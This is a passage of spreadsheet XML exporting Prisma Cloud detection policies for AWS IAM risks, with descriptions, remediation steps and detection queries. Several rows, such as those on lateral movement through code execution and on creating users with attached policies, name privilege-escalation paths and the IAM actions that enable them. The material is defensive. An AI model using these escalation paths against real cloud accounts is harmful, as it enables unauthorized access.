          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3172" t="inlineStr"/>
      <c r="AD3172" t="b">
        <v>1</v>
      </c>
      <c r="AE3172" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3172" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>bb8a13e4-d3d9-4618-925a-0cff3526430e</t>
        </is>
      </c>
      <c r="AI3172" t="inlineStr">
        <is>
          <t>bb8a13e4-d3d9-4618-925a-0cff3526430e</t>
        </is>
      </c>
      <c r="AJ3172" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3172" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3173">
      <c r="A3173" t="inlineStr"/>
      <c r="B3173" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3173" s="2" t="inlineStr"/>
      <c r="D3173" t="inlineStr"/>
      <c r="E3173" t="inlineStr"/>
      <c r="F3173" t="inlineStr"/>
      <c r="G3173" t="b">
        <v>1</v>
      </c>
      <c r="H317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73" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3173" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3173" t="inlineStr">
        <is>
          <t>User with a lateral movement finding to admin through code execution on compute resources</t>
        </is>
      </c>
      <c r="L3173" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3173" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3173" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3173" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3173" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3173" t="inlineStr"/>
      <c r="R3173" t="inlineStr"/>
      <c r="S3173" t="inlineStr"/>
      <c r="T3173" t="b">
        <v>1</v>
      </c>
      <c r="U3173" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3173" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3173" t="inlineStr">
        <is>
          <t>Identifies users with permissions to execute code on privileged compute resources. This allows the user to execute code using the compute resource's privileges. As such, a compromise of such a user could allow an adversary to escalate their privileges and further themselves within the environment.</t>
        </is>
      </c>
      <c r="X3173" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the user ("Source"), their permission grantor ("Granted By Entity"), the action which allows code execution ("Action") and the administrative compute resource ("Destination").
In order to remove any administrative permissions and minimize the potential privilege escalation avenues, use the following remediation steps:
Browse to the permission grantor ("Granted By Entity") in the AWS Console. Select the 'Permissions' tab, and search for the action and scope we observed in the "investigate" page ("Action", "Destination").  If deemed unnecessary, remove the permissions by either editing the policy or replacing it (notice: editing a customer managed policy could affect other roles). Lastly, review the permissions given to the compute resource ("Destination") and remove if deemed unnecessary.</t>
        </is>
      </c>
      <c r="Y317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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type = 'User' AND grantedby.cloud.entity.type = 'user' AND source.cloud.resource.isadministrative = false AND action.name IN ( 'ec2:ModifyInstanceAttribute', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey', 'lambda:UpdateFunctionCode', 'lambda:UpdateFunctionConfiguration', 'lambda:AddPermission', 'glue:UpdateDevEndpoint'  ) AND dest.cloud.resource.type IN ( 'Instance', 'function', 'devendpoint') AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3173" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3173" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3173" t="inlineStr"/>
      <c r="AD3173" t="b">
        <v>1</v>
      </c>
      <c r="AE3173" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3173" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG317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73" t="inlineStr">
        <is>
          <t>7054f8cc-9801-4a0a-8270-c005c24b0308</t>
        </is>
      </c>
      <c r="AI3173" t="inlineStr">
        <is>
          <t>7054f8cc-9801-4a0a-8270-c005c24b0308</t>
        </is>
      </c>
      <c r="AJ3173" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3173" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3174">
      <c r="A3174" t="inlineStr"/>
      <c r="B3174" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3174" s="2" t="inlineStr"/>
      <c r="D3174" t="n">
        <v>0</v>
      </c>
      <c r="E3174" t="n">
        <v>394</v>
      </c>
      <c r="F3174" t="n">
        <v>0</v>
      </c>
      <c r="G3174" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3174" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3174" t="inlineStr">
        <is>
          <t>AWS Lambda Function with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3174" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3174" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3174" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3174" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3174" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3174" t="inlineStr"/>
      <c r="R3174" t="inlineStr"/>
      <c r="S3174" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3174" t="b">
        <v>1</v>
      </c>
      <c r="U3174" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3174" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3174" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM permissions that contain '*' in the resource section of the policy statement. The policy will identify those '*' only in case using '*' is not mandatory. Ensure that the AWS policies don't have '*' in the resource section of the policy statement.</t>
        </is>
      </c>
      <c r="X3174" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the role used by the Lambda Function instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y317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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'lambda' AND source.cloud.resource.type = 'function'</t>
        </is>
      </c>
      <c r="AA3174" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3174" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3174" t="inlineStr"/>
      <c r="AD3174" t="b">
        <v>1</v>
      </c>
      <c r="AE3174" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3174" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>a06d6016-d256-48cd-9c31-bafcbc593045</t>
        </is>
      </c>
      <c r="AI3174" t="inlineStr">
        <is>
          <t>a06d6016-d256-48cd-9c31-bafcbc593045</t>
        </is>
      </c>
      <c r="AJ3174" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3174" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3175">
      <c r="A3175" t="inlineStr"/>
      <c r="B3175" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3175" s="2" t="inlineStr"/>
      <c r="D3175" t="inlineStr"/>
      <c r="E3175" t="inlineStr"/>
      <c r="F3175" t="inlineStr"/>
      <c r="G3175" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3175" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3175" t="inlineStr">
        <is>
          <t>AWS EC2 with write permission on critical configuration for s3</t>
        </is>
      </c>
      <c r="L3175" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3175" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3175" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3175" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3175" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3175" t="inlineStr"/>
      <c r="R3175" t="inlineStr"/>
      <c r="S3175" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3175" t="b">
        <v>1</v>
      </c>
      <c r="U3175" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3175" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3175" t="inlineStr">
        <is>
          <t>This Policy identifies the permissions impact Amazon S3 (Simple Storage Service). that control object retention, lifecycle rules, access policies, and versioning. Misuse can affect data integrity, storage costs, access control, and version management.  It is recommended to assign and manage these permissions to trusted individuals to prevent unintended data loss, security risks, or unauthorized access to S3 resources.</t>
        </is>
      </c>
      <c r="X3175"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7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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('s3:PutObjectRetention','s3:PutLifecycleConfiguration','s3:PutBucketPolicy','s3:PutBucketVersioning') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3175" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3175" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3175" t="inlineStr"/>
      <c r="AD3175" t="b">
        <v>1</v>
      </c>
      <c r="AE3175" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3175" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>532ec2dd-ab43-4297-844d-882506306ae8</t>
        </is>
      </c>
      <c r="AI3175" t="inlineStr">
        <is>
          <t>532ec2dd-ab43-4297-844d-882506306ae8</t>
        </is>
      </c>
      <c r="AJ3175" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3175" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3176">
      <c r="A3176" t="inlineStr"/>
      <c r="B3176" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3176" s="2" t="inlineStr"/>
      <c r="D3176" t="n">
        <v>0</v>
      </c>
      <c r="E3176" t="n">
        <v>0</v>
      </c>
      <c r="F3176" t="n">
        <v>129</v>
      </c>
      <c r="G3176" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3176" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3176" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3176" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3176" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3176" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3176" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3176" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3176" t="inlineStr"/>
      <c r="R3176" t="inlineStr"/>
      <c r="S3176" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3176" t="b">
        <v>1</v>
      </c>
      <c r="U3176" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3176" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3176" t="inlineStr">
        <is>
          <t>Unused IAM users with seemingly harmless "Data Read" permissions can pose a threat after 90 days of inactivity. Here's why:
- Access to Sensitive Data: Data Read allows users to view potentially sensitive information within AWS resources like S3 buckets or databases. An attacker exploiting these credentials could steal this data.
- Compromised Accounts: Unused accounts are attractive targets. If compromised, attackers could leverage Data Read permissions to gain valuable insights into your data storage and potentially discover more sensitive information.
- Leaving such access unchecked creates a window of opportunity for attackers. Here's how to mitigate the risk:
Regular Review: Identify and disable unused IAM users with any Data Read permissions. Prioritize those with access to critical data stores.
Least Privilege Principle: Assign roles with the minimum permissions required for a user or machine identity to function. Data Read should only be granted if absolutely necessary.
MFA for Critical Access: Enforce Multi-Factor Authentication (MFA) for users with access to sensitive data. This adds an extra layer of security and makes it harder for attackers to exploit compromised credentials.</t>
        </is>
      </c>
      <c r="X3176"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17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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3176" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3176" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3176" t="inlineStr"/>
      <c r="AD3176" t="b">
        <v>1</v>
      </c>
      <c r="AE3176" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3176" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>08b6e763-a47d-48e8-bbc4-8182e346a632</t>
        </is>
      </c>
      <c r="AI3176" t="inlineStr">
        <is>
          <t>08b6e763-a47d-48e8-bbc4-8182e346a632</t>
        </is>
      </c>
      <c r="AJ3176" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3176" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3177">
      <c r="A3177" t="inlineStr"/>
      <c r="B3177" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3177" s="2" t="inlineStr"/>
      <c r="D3177" t="inlineStr"/>
      <c r="E3177" t="inlineStr"/>
      <c r="F3177" t="inlineStr"/>
      <c r="G3177" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3177" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3177" t="inlineStr">
        <is>
          <t>AWS IAM Groups and Roles with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3177" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3177" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3177" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3177" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3177" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3177" t="inlineStr"/>
      <c r="R3177" t="inlineStr"/>
      <c r="S3177" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3177" t="b">
        <v>0</v>
      </c>
      <c r="U3177" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3177" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3177" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Groups and Roles with Stale IAM  Data Write Permissions.
Risk of Unused Data Write Permissions:
IAM groups and roles with Unused IAM Data Write permissions for 90 days pose a significant security threat because:
Unsecured Access Point: These groups and roles act like forgotten open doors with high-level access. If compromised, attackers can directly modify or delete sensitive data stored in S3 buckets, DynamoDB tables, or other AWS services. This could lead to severe disruption, data breaches, or financial losses.
Elevated Attack Potential: Data Write permissions grant attackers the ability to manipulate core information. They could tamper with databases, alter financial records, or corrupt other critical data, leading to significant consequences.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused IAM groups and roles with any level of IAM  Data Write permissions (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Data Write access required for a group or role to function ly. Evaluate if alternative methods, like IAM conditions or resource-based policies, can restrict access to specific data sets or services.
Monitor for Data Anomalies: Implement Amazon CloudWatch to monitor data access attempts and changes within your AWS services. This vigilance can help detect unusual activity related to unused groups or roles that might indicate a compromise and data tampering.</t>
        </is>
      </c>
      <c r="X3177"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177" t="inlineStr"/>
      <c r="Z3177" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.entity.type NOT IN ('user') AND grantedby.cloud.policy.type != 'Resource-based Policy'  and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3177" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3177" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3177" t="inlineStr"/>
      <c r="AD3177" t="b">
        <v>1</v>
      </c>
      <c r="AE3177" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3177" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>039627c3-5375-4865-b7f3-807d1af17965</t>
        </is>
      </c>
      <c r="AI3177" t="inlineStr">
        <is>
          <t>039627c3-5375-4865-b7f3-807d1af17965</t>
        </is>
      </c>
      <c r="AJ3177" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3177" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3178">
      <c r="A3178" t="inlineStr"/>
      <c r="B3178" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3178" s="2" t="inlineStr"/>
      <c r="D3178" t="n">
        <v>0</v>
      </c>
      <c r="E3178" t="n">
        <v>120</v>
      </c>
      <c r="F3178" t="n">
        <v>0</v>
      </c>
      <c r="G3178" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3178" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3178" t="inlineStr">
        <is>
          <t>IAM User with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3178" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3178" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3178" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3178" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3178" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3178" t="inlineStr"/>
      <c r="R3178" t="inlineStr"/>
      <c r="S3178" t="inlineStr"/>
      <c r="T3178" t="b">
        <v>1</v>
      </c>
      <c r="U3178" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3178" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3178" t="inlineStr">
        <is>
          <t>This policy identifies IAM User with AWS IAM permissions that contain '*' in the resource section of the policy statement. The policy will identify those '*' only in case using '*' is not mandatory. Ensure that the AWS policies don't have '*' in the resource section of the policy statement.</t>
        </is>
      </c>
      <c r="X3178" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y317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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3178" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3178" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3178" t="inlineStr"/>
      <c r="AD3178" t="b">
        <v>1</v>
      </c>
      <c r="AE3178" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3178" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>bc74108e-3cf1-42ef-8a52-d0119c5f8c97</t>
        </is>
      </c>
      <c r="AI3178" t="inlineStr">
        <is>
          <t>bc74108e-3cf1-42ef-8a52-d0119c5f8c97</t>
        </is>
      </c>
      <c r="AJ3178" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3178" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3179">
      <c r="A3179" t="inlineStr"/>
      <c r="B3179" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3179" s="2" t="inlineStr"/>
      <c r="D3179" t="inlineStr"/>
      <c r="E3179" t="inlineStr"/>
      <c r="F3179" t="inlineStr"/>
      <c r="G3179" t="b">
        <v>1</v>
      </c>
      <c r="H31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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3179" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3179" t="inlineStr">
        <is>
          <t>AWS EC2 instance with database management write access permissions</t>
        </is>
      </c>
      <c r="L3179" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3179" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3179" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3179" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3179" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3179" t="inlineStr"/>
      <c r="R3179" t="inlineStr"/>
      <c r="S3179" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3179" t="b">
        <v>1</v>
      </c>
      <c r="U3179" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3179" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3179" t="inlineStr">
        <is>
          <t>The policy restricts write access of AWS EC2nstances to DB such as RDS, DocumentDB, DynamoDB etc.(https://docs.aws.amazon.com/index.html), aiming to prevent unauthorized modifications to critical database services hosted on AWS. It enhances security by enforcing granular access control and aligning with the principle of least privilege.</t>
        </is>
      </c>
      <c r="X3179"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7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79" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 'rds:ModifyDBCluster','rds:ModifyDBClusterEndpoint','rds:ModifyDBInstance','rds:ModifyDBSnapshot','rds:ModifyGlobalCluster','dynamodb:UpdateItem','dynamodb:UpdateTable','memorydb:UpdateCluster','neptune-db:ResetDatabase','neptune-db:WriteDataViaQuery','docdb-elastic:UpdateCluster','elasticache:ModifyCacheCluster','cassandra:Alter','cassandra:Modify','qldb:ExecuteStatement','qldb:PartiQLUpdate','qldb:SendCommand','qldb:UpdateLedger','redshift:ModifyCluster','redshift:ModifyClusterSnapshot','redshift:ModifyEndpointAccess','timestream:UpdateDatabase','timestream:UpdateTable','timestream:WriteRecords') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3179" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3179" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3179" t="inlineStr"/>
      <c r="AD3179" t="b">
        <v>1</v>
      </c>
      <c r="AE3179" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3179" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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79" t="inlineStr">
        <is>
          <t>b3b5d4c5-7828-431c-9472-43ff27b644a6</t>
        </is>
      </c>
      <c r="AI3179" t="inlineStr">
        <is>
          <t>b3b5d4c5-7828-431c-9472-43ff27b644a6</t>
        </is>
      </c>
      <c r="AJ3179" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3179" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3180">
      <c r="A3180" t="inlineStr"/>
      <c r="B3180" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3180" s="2" t="inlineStr"/>
      <c r="D3180" t="n">
        <v>4</v>
      </c>
      <c r="E3180" t="n">
        <v>1</v>
      </c>
      <c r="F3180" t="n">
        <v>0</v>
      </c>
      <c r="G3180" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3180" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3180" t="inlineStr">
        <is>
          <t>AWS EC2 instance with the creation of a new User with attached policy permission</t>
        </is>
      </c>
      <c r="L3180" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3180" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3180" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3180" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3180" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3180" t="inlineStr"/>
      <c r="R3180" t="inlineStr"/>
      <c r="S3180" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3180" t="b">
        <v>1</v>
      </c>
      <c r="U3180" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3180" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3180" t="inlineStr">
        <is>
          <t>With access to 'iam:CreateUser', 'iam:AttachUserPolicy' permissions, an adversary can create IAM users with privileged permissions, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X318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8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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:CreateUser','iam:AttachUserPolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3180" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3180" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3180" t="inlineStr"/>
      <c r="AD3180" t="b">
        <v>1</v>
      </c>
      <c r="AE3180" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3180" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>247d4e3a-ee78-4505-bcff-8e9d505f39aa</t>
        </is>
      </c>
      <c r="AI3180" t="inlineStr">
        <is>
          <t>247d4e3a-ee78-4505-bcff-8e9d505f39aa</t>
        </is>
      </c>
      <c r="AJ3180" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3180" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3181">
      <c r="A3181" t="inlineStr"/>
      <c r="B3181" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3181" s="2" t="inlineStr"/>
      <c r="D3181" t="n">
        <v>0</v>
      </c>
      <c r="E3181" t="n">
        <v>326</v>
      </c>
      <c r="F3181" t="n">
        <v>0</v>
      </c>
      <c r="G3181" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3181" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3181" t="inlineStr">
